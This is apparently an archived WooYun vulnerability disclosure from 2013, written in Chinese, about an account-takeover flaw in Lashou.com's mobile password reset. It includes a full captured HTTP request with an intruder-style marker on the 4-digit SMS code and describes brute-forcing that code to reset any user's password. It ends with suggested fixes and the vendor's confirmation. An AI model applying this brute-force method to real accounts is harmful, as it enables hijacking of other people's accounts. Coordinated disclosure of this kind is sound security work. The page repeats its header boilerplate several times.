换个姿势第三次重置拉手网任意用户密码

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-047169

漏洞标题：换个姿势第三次重置拉手网任意用户密码

漏洞作者： niliu

提交时间：2013-12-27 17:14

修复时间：2014-02-10 17:15

公开时间：2014-02-10 17:15

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-27：细节已通知厂商并且等待厂商处理中
2013-12-27：厂商已经确认，细节仅向厂商公开
2014-01-06：细节向核心白帽子及相关领域专家公开
2014-01-16：细节向普通白帽子公开
2014-01-26：细节向实习白帽子公开
2014-02-10：细节向公众公开

简要描述：

另一种姿势，同样可以简单重置拉手网用户密码！

详细说明：

第一次重置密码是利用爆破手机验证码方式重置用户密码： WooYun: 拉手网设计不当可修改部分用户密码
第二次是利用某处信息泄露组合技能重置用户密码： WooYun: 猥琐方式再次重置拉手网用户密码
这一次是受@带馅儿馒头的这个漏洞 WooYun: 拉手网某处设计缺陷导致可重置任意用户密码的启发通过APP重置密码抓包来重置密码。
ios端找回密码只支持手机号码找回密码，上次带馅儿馒头提到的通过抓包，发包在返回的代码注释里直接显示了手机验证码。经过测试已经修复。
但是换个方式依然还是可以重置密码。
首先先在手机端找回密码，

系统会发送一个4位数字验证码，用来重置密码。
这里我随便写个1111来提交。提交前设置好代理，PC端抓包

抓包数据：

POST /lashou.php/Pass/upPwd/STID/groupbuy_5.70_iphone_10000_6CC26BF381DC_4003212_2419_iPhone3,1_5.1.1_(null)_fbc20bed0cf5eb6531***02be5c393541c2ed178 HTTP/1.1
Host: api.mobile.lashou.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B206
Content-Length: 472
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://api.mobile.lashou.com
Content-Type: application/x-www-form-urlencoded
Referer: http://api.mobile.lashou.com/lashou.php/Pass/sendPwdCode/STID/groupbuy_5.70_iphone_10000_6CC26BF381DC_4003212_2419_iPhone3,1_5.1.1_(null)_fbc20bed0cf5eb6531b4*****93541c2ed178
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Cookie: ThinkID=66ffc98d52bd20e3e463f
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive
code=§1111§&password=a123456789&pass_again=a123456789&tip=%E5%8F%91%E9%80%81%E6%88%90%E5%8A%9F%EF%BC%8C%E8%AF%B7%E6%B3%A8%E6%84%8F%E6%9F%A5%E6%94%B6&mobile=18********4&email=&sign=d856983ac5ff53492***d0adb9a7f77c&nostid=&stid=groupbuy_5.70_iphone_10000_6CC26BF381DC_4003212_2419_iPhone3%2C1_5.1.1_%28null%29_fbc20bed0cf5eb653****2be5c393541c2ed178&params=%7B%22time%22%3A1388126455%7D&time=1388126455&__hash__=fc73c443fb7bc484b6**3fc2b892_d4f9017b4a8054242959c72b15b8b

4位数字验证码爆破速度是非常快的。很简单就可以重置密码。

跑完4位数字验证码，密码也重置成功了。登录即可。

漏洞证明：

上面。

修复方案：

#同一个地方问题修复要彻底。
#对APP端验证码提交做个限制。
#没有礼物就求高rank~ ：）

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2013-12-27 20:30

厂商回复：

感谢，已经告知开发！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-047169

漏洞标题：换个姿势第三次重置拉手网任意用户密码

相关厂商：拉手网

漏洞作者： niliu

提交时间：2013-12-27 17:14

修复时间：2014-02-10 17:15

公开时间：2014-02-10 17:15

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-047169

漏洞标题：换个姿势第三次重置拉手网任意用户密码

相关厂商：拉手网

漏洞作者： niliu

提交时间：2013-12-27 17:14

修复时间：2014-02-10 17:15

公开时间：2014-02-10 17:15

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-047169"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：